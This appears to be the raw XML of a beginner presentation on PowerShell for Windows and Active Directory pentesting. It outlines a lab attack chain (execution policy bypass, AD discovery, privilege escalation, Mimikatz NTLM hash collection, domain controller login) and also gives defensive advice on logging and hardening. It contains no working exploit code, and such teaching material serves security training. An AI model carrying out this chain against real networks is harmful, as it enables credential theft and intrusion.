            <a:endParaRPr lang="uk-UA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6278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B6DB-E2C3-44E9-BC28-FB08080D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Protection and Conclusion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BEF986-BDF7-41B0-BE4B-668B68C76935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="823993" y="209614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Enable logging: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6FC69-FE23-4F32-9E24-20AC6DC189B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276026" y="2483601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err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> logging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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Module logging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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Pipeline execution logging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27690-1172-4F15-A4C9-FA4374D280B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743772" y="208968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Use security check tools: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869B4-7EF5-4245-9D67-4AD479F55AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195805" y="2483600"/>
            <a:ext cx="61980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uk-UA" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>NetCase.ps1</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA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uk-UA" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SAMRi10.ps1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://gallery.technet.microsoft.com/SAMRi10-Hardening-Remote-48d94b5b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA" sz="12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B73D1-4BA6-4AC5-B6CF-06E1CA6853E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740043" y="3658890"/>
            <a:ext cx="33437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Windows Defender modules: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585BE-D2D1-4313-9498-E209410833F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192076" y="4046346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>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Credential Guard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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Device Guard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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Pipeline execution logging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C1C1D5-F0B6-4A74-B079-4669B5EF5E2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743772" y="3710552"/>
            <a:ext cx="4641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Follow Windows Security recommendations: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2A215-D478-4F6C-B5B9-00228AF17F4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195805" y="4098008"/>
            <a:ext cx="309836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>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Best Practices for Security Active Directory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798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03A3-9C31-4CFE-B7EC-501A92F7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Oh No!  PowerShell? Really?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858550-EB68-4712-9AA3-FF450953D228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12196314" y="5510028"/>
            <a:ext cx="747106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Calibri"/>
              </a:rPr>
              <a:t>Goal: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For beginners Show steps to begin with.</a:t>
            </a:r>
          </a:p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How to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servive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in Windows world.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Wahat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to do if corporate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polisy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prohibit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linux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with strict Active directory policies.</a:t>
            </a:r>
          </a:p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From PowerShell possibilities to tools that can be used.</a:t>
            </a:r>
          </a:p>
          <a:p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Some  people use windows to run kali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linux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for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pentest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windows networks</a:t>
            </a:r>
          </a:p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-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toolong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path :)</a:t>
            </a:r>
          </a:p>
          <a:p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Is windows  enough?</a:t>
            </a:r>
          </a:p>
          <a:p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(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ofcource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neve for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linux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gay :)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EECF7-AF9E-4EF3-91A3-689445B25498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122952" y="4301426"/>
            <a:ext cx="824274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You exploit something on Windows and need to move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>further</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> in AD network.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA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You should make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> as regular user with default settings.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Some like to use windows to run Kali Linux for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> windows networks 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Linux is prohibited in your company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0FA96-4198-44C4-8BFB-9BDB38B63AFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836908" y="1857213"/>
            <a:ext cx="6638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Goal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F51CD-00ED-4538-90A0-2887499F6587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837716" y="3745261"/>
            <a:ext cx="40540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Cases when can be needed PowerShell</a:t>
            </a:r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B1751-D3DC-4471-B6B0-BE6ADE79F9AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122658" y="2246285"/>
            <a:ext cx="534562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dirty="0"/>
              <a:t>Show steps to begin with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1"/>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brief description of existing tools, scripts and techniques. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of using.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 8" descr="Зображення, що містить будівля&#10;&#10;Опис створено з високим рівнем достовірності">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A08647-F291-4D90-9175-F8A88C7A4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858" y="1825571"/>
            <a:ext cx="2743200" cy="2057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3684D4-D794-4E2B-B497-88A551AA932A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8805620" y="5079569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sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>https://giphy.com/gifs/season-12-the-simpsons-12x12-3o6Mb8ARo4g0MBKxvq</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA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449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664A-4693-4705-8F6B-635F5A04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Sources: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13A53-D891-4A54-8903-F8E8B2FE28AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836468" y="1780309"/>
            <a:ext cx="990426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From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://blog.nullmode.com/blog/2014/06/28/getting-personal-with-powershell/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Saved on git:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="120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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://web.archive.org/web/20190508170906/https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="120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Obfuscation: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https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf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  <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier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  <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="120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Examples: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  <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://github.com/pan-unit42/iocs/tree/master/psencmds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2408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00C3-274A-4D60-B368-42CD7B7F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Poc Description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D58D5-0218-4BED-90D6-4F6819111FE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860317" y="226896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Scenario of exploitation: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15465-6EB7-4351-B478-AB5BC688F149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297087" y="2996177"/>
            <a:ext cx="443172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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>First steps</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA" sz="1600" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Bypass execution policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Active Directory  discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>  session to the DNS server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sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Escalate privileges to local admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> to collect NTLM hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Login into  corp-dc </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:cs typeface="Calibri"/>
            </a:endParaRP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C1BEDC9F-AE12-4204-8F4E-BF3F1B8AA6F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9235078" y="1375480"/>
            <a:ext cx="1217628" cy="17832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err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-dc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>192.168.100.100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9DBE4462-2011-4557-9006-41193033731F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9126572" y="3623675"/>
            <a:ext cx="1217628" cy="205818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F1086E-4778-4E50-8993-A1E3113307A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9126521" y="3164067"/>
            <a:ext cx="15255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uk-UA" sz="1200" err="1"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200" err="1"/>
              <a:t>controller</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA" sz="1200" err="1">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>192.168.100.100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75A94C-3D30-4E49-9945-21C540B2810B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8930130" y="5630747"/>
            <a:ext cx="15255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uk-UA" sz="1200"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200" err="1"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA" err="1">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>192.168.100.101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 10" descr="Ноутбук">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D04CF17-C5BB-4AED-878D-4A4079618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8275" y="4164970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C8A1F7-9EF7-4639-9B05-3DF76595841A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6357398" y="4938556"/>
            <a:ext cx="132132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uk-UA" sz="1200" dirty="0" err="1"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200" dirty="0"/>
              <a:t> PC</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>192.168.100.69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5EF1B4-789C-4E64-8BE5-7CAF17B00D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5784621" y="1059436"/>
            <a:ext cx="5561812" cy="477624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321CEA-CEEA-4491-B3C8-79E20B5B1920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7355558" y="1228135"/>
            <a:ext cx="18712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err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>corp.local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71C3AC-2034-4E3A-9C36-013F6E09A3C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7561119" y="4720935"/>
            <a:ext cx="1485898" cy="59401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CFA970-849F-434C-AC9A-DE98BBC742FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858866" y="3975389"/>
            <a:ext cx="457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08AF8C-D069-44C4-A385-95392D4F13C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6469207" y="3975388"/>
            <a:ext cx="457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4CAF7D-C2A7-463E-9CA8-45C29E8E804B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8105775" y="4564207"/>
            <a:ext cx="457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B27666-C027-4308-AF12-E6087643018A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9231457" y="5170343"/>
            <a:ext cx="457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cs typeface="Calibri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A1B4E-8BCD-4C91-B227-313582B28B43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10227252" y="4806661"/>
            <a:ext cx="457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27F4F1-8772-4515-90A4-3B32C309AC44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9430615" y="4096615"/>
            <a:ext cx="457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cs typeface="Calibri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F6A104-6241-49FA-A8C2-3DE1802675A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7941253" y="2918979"/>
            <a:ext cx="457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30C05C-3D77-4EC1-8039-BDC109D4E2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9232322" y="4469822"/>
            <a:ext cx="710045" cy="3636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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Service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0D2B3FEB-A596-4D45-AA5A-EB9B977F9BA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10680000">
            <a:off x="9981909" y="4640045"/>
            <a:ext cx="233795" cy="710045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4B3340-E5CE-48B8-B32D-1236A4BDA177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7574107" y="2444461"/>
            <a:ext cx="1572490" cy="15794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83F6674-1A75-4C4D-9B43-CFDD6A659DB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7187911" y="3975387"/>
            <a:ext cx="457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3834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C555-D780-48C2-BF22-749C37BE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1. First steps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015C1-4E03-433D-BF3E-B033B779896E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="865302" y="199589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Advantages of PowerShell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38C7A-093F-42FC-87D4-918701F59C29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2108462" y="270549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dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Has built in commands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DDC5EC-89F9-4E45-86F7-A163FDF29919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2108462" y="3192544"/>
            <a:ext cx="42907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dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Can use .NET classes directly in console </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140827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723C-2368-4809-A835-2A53B4CC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1. First steps. Built in commands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5C81D-0FFB-4CBD-BF89-8872B36B94EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005468" y="3225717"/>
            <a:ext cx="28745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Get-Help   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Get-Help New-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PSSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> -examples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9DF78-EFAC-4F59-8611-0FEDADADCA6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1004424" y="3731339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Get-Process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4E23D-A26E-4029-B989-CC81B51B3DB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007668" y="4068427"/>
            <a:ext cx="268481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Get-Command –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>CommandType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> cmdlet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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A0ACD-7B0B-4F6B-AED4-F2F5B2C68BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007815" y="2566399"/>
            <a:ext cx="11720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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
